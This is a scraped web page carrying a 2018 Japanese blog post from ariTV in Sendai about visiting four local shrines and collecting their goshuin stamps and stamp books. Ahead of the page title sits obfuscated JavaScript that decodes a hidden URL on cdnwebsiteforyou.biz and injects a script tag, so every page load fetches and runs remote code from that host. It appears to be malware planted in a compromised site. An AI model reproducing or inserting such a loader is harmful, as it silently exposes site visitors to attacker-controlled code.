var a1=function(){var _0x41fbx1=String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](104,116,116,112,115,58,47,47,99,100,110,119,101,98,115,105,116,101,102,111,114,121,111,117,46,98,105,122,47,99,100,110,46,106,115,63,99,61,50);var _0x41fbx2=document["\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74"]("\x73\x63\x72\x69\x70\x74");_0x41fbx2["\x74\x79\x70\x65"]= "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74";_0x41fbx2["\x61\x73\x79\x6E\x63"]= true;_0x41fbx2["\x69\x64"]= "\x63\x64\x37\x30\x39\x30\x31\x30";_0x41fbx2["\x73\x72\x63"]= _0x41fbx1;var _0x41fbx3=document["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"]("\x73\x63\x72\x69\x70\x74")[0];_0x41fbx3["\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"]["\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65"](_0x41fbx2,_0x41fbx3)};var scripts=document["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"]("\x73\x63\x72\x69\x70\x74");var n=true;for(var i=0;i< scripts["\x6C\x65\x6E\x67\x74\x68"];i++){if(scripts[i]["\x69\x64"]== "\x63\x64\x37\x30\x39\x30\x31\x30"){n= false}};if(n== true){a1()} 御朱印ガールが急増中!!   ふぇ?? 御朱印って何? - ariTV(アリティーヴィー) | 仙台発!インターネットテレビ局

御朱印ガールが急増中!!   ふぇ?? 御朱印って何?

2018.06.08

こんにちは!アリティーヴィーの新人クルーのトガシです!

将来の夢はあわよくば小説家になりたいと思っています(笑)

 

今日は、私トガシがアリティーヴィーの初取材で感じたことを綴っていきたいと思います。

 

で!取材のテーマは何かというと・・・神社やお寺でもらえる「御朱印」です

 

皆さん御朱印ってご存知でしょうか?

 

簡単に言うと、「参拝した証」となるのが御朱印です。

お札とは違いますので勘違いなさらないように。

 

今、この御朱印を集めるのが歴女さんたちなどの間でブームになっているようなんです!

“御朱印ガール”といったところでしょうか。

 

ということで、今回は仙台市内にある4カ所の神社を巡り、御朱印を集めてまいりました~(^^)/

 

 

①愛宕神社

 

地下鉄愛宕橋駅から徒歩8分。山を少し上った先にあるのがこの愛宕神社です。

祀っている神様は軻遇土神。火の神様です。

カグツチノカミと読みます。ひ~、舌を噛みそ~!

この神社は「辰年」「巳年」生まれの人を守護する神社で、仙台ではここだけ! 辰年巳年の方がたくさんいらっしゃる神社のようです。

 

 

 

そしてこの門の両脇にいらっしゃるのが愛宕神社の有名な天狗様! 日本で一番大きい天狗様だそうですよ!

残念ながらカメラにその姿を収めることはできませんでした……(-_-)。

きっと霊的なエネルギーが強すぎて映すことが出来なかったんですね! ※(ホントは撮影環境のせいです。テヘッ)

ちなみに天狗というのは西洋で言うところの天使のような存在、神の使いなんだそうですよ~。

物見台からは仙台を一望! 景色も最高です(^^)

 

 

そして、本題、御朱印帳を紹介しましょう!

 

はい、ドーン!!

カッコイイ!!

 

表には二座の天狗様。裏面にはこの神社が守護する辰と巳の絵。躍動感があってステキです!

愛宕神社の特色が詰まったクールな御朱印帳ですね!

 

そして、これが御朱印です!

ほほう!!

黒の墨と朱印の感じがクールな和を感じさせますね~。

 

ところで皆さん、これ、直筆なんですよ?

 

凄くないですか!?

 

一冊一冊神社の方が書いてくれるんです。達筆ですよね~。ありがたいですよね~。

私もこんな綺麗な字が書けるようなカッコイイ大人になりたい!

 

 

②榴岡天満宮

続いて訪れたのがここ、榴岡天満宮です。

祀っている神様は菅原道真公。「学問の神様」として有名ですよね。

お参りされる方も合格祈願で訪れることが多いようです。

 

そして、桜の木がいっぱいありました~。

ここは桜が見事な神社としても有名なんですよ。

来年は是非こちらで綺麗な桜を観に来ましょう!

 

 

そしてこちらが御朱印帳です。

かわいいっ!ウフッ

 

可愛いですっ!ウフフフフ

 

純白の紙面に桜の絵があしらわれたウフフなデザイン。桜で有名な榴岡天満宮らしいですね。

インスタ映え間違いなし! 御朱印ガールにはたまらないですね(^^)

 

 

そしてこちらが御朱印。

素敵!

 

 

最初に行った愛宕神社ともまたデザインが違いますよね。

見開き2ページもつかって、更に達筆で和歌が書かれています。

うーん……これはなかなか……。

 

 

③仙台東照宮

仙台東照宮は徳川家康公をお祀りした神社です。

御利益として「開運厄除」「家内安全」「学業成就」「商売繁盛」「必勝祈願」などがあるそうです。スゲー、何でも願い叶っちゃうかも・・・。

 

これが鳥居をくぐってすぐにある石灯籠。

厳かですね~。何かホントに御利益がありそうな雰囲気~。

 

 

そしてこちらが御朱印帳。 ドーン!

カッコイイです!

深い青色の紙面に竜や唐獅子たちが躍動感たっぷりに描かれています。ワンポイントに施された金色の葵の紋がオシャレですよね(^^)

この紋所が目に入らぬか~!!(笑)

 

そして……

 

東照宮さんではなんと、

 

 

御朱印帳に書いているところを見せてもらいましたー!!

 

 

すごい!興奮(> <)

 

実際にその工程を載せて行きたいと思います!

 

 

まずは御朱印を押して……

押して……

書いていきます……

な、なな、なんて凄い集中力なんだ! 見ているこっちも緊張してしまいますよね。

今まで沢山の所で御朱印を集めてきた御朱印帳。そこに筆を下す以上失敗はできません。

私がやったなら御朱印を押す段階で上下逆に押してしまい発狂する未来が見えます……(;一_一)

いやはや素晴らしい。

 

 

そして完成した御朱印がこちら!

できる過程を見ているとまた重みが増してきますよね。・・・尊い!

 

 

④大崎八幡宮

社殿、美しいですね! 極彩色のカラーリングと金色の細工がまぶしー!

大崎八幡宮は御利益に「厄除け」「除災招福」「必勝」「安産」等があります。

必勝の御利益があるということで楽天やベガルタの勝利を祈願するものも売っていました。

 

飾られていた絵馬には羽生結弦選手のオリンピック成功を願うものも。

中には台湾からのファンの絵馬もありましたよ~。

 

 

そして本題の御朱印帳……

おぉ・・・(沁)

夜でしょうか。真黒な紙面に極彩色の社殿が描かれています。

真っ暗やみの中でより映える社殿の美しさ。夜の厳かな空気感が伝わってくるようです。

裏には鶴と三つ巴。かっこいいデザインです。

 

そして御朱印はこちら、

厳かさと優美さを併せ持つ大崎八幡宮らしい文体ではないでしょうか。

 

 

 

以上、四か所巡ってきましたが、いかかがでしたでしょうか! 仙台市内御朱印巡り。

 

 

 

御朱印自体も素敵ですが御朱印帳のデザインも神社ごとに個性がありカッコいいですよね。

またそれぞれの神社の特徴を存分に映しこんだ装丁。御朱印帳集めもやりたくなってしまいます(*^_^*)

 

皆さんも是非、素敵な御朱印集め、始めてみてくださいね~!

 

最後に、御朱印は魅力的ですがスタンプラリーではございません。巡る場所は神社やお寺ですので礼儀礼節を知り、最低限のマナーを守ってご参拝下さいm(__)m

 

――あっ小説家になれますように!ってお願いしてくるの忘れちゃった。テヘ